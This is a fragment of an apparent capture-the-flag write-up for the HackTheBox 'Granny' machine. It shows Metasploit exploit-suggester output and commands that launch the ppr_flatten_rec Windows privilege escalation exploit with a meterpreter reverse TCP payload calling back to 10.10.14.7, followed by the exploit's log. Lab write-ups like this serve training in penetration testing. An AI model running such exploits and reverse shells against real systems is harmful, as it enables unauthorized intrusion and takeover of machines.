Granny(webDAV put+move获取webshell)
Administrator ASPNET Guest
IUSR_GRANPA IWAM_GRANPA Lakis
SUPPORT_388945a0
The command completed successfully.
1 | |
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
1 | |
background
use post/windows/manage/migrate
set SESSION 1
run
use exploit/windows/local/ppr_flatten_rec
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.7
set LPORT 8899
set SESSION 1
1 | |
[] Started reverse TCP handler on 10.10.14.7:8899
[] Launching notepad to host the exploit…
[+] Process 208 launched.
[] Reflectively injecting the exploit DLL into 208…
[] Injecting exploit into 208 …
[] Exploit injected. Injecting payload into 208…
[] Payload injected. Executing exploit…
[] Exploit thread executing (can take a while to run), waiting 30 sec …
[] Exploit completed, but no session was created.
1 | |
set wait 20
```